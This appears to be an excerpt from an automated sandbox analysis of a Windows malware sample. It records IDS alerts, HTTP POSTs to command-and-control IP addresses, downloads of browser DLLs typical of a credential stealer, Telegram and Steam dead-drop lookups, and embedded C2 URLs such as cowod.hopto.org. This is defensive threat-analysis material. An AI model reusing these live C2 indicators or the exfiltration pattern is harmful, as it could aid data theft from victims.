                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50008 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50010 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50011 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50013 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50014 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50009 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50012 -> 95.217.220.103:443
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 5461Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEGDBAEBFIIDHJJJEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 109281Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 107.191.36.218
                          Source: unknownTCP traffic detected without corresponding DNS query: 107.191.36.218
                          Source: unknownTCP traffic detected without corresponding DNS query: 107.191.36.218
                          Source: unknownTCP traffic detected without corresponding DNS query: 107.191.36.218
                          Source: unknownTCP traffic detected without corresponding DNS query: 107.191.36.218
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00926963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_00926963
                          Source: global trafficHTTP traffic detected: GET /fun88rockskek HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 107.191.36.218Connection: Keep-AliveCache-Control: no-cache
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: -Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: t.me
                          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                          Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.191.36.218/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.191.36.218/0
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.191.36.218/b
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.191.36.218/r
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.191.36.218:80
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.ECBGCBFHIJJK
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.FHIJJK
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.orgJJK
                          Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hoptoBFHIJJK
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
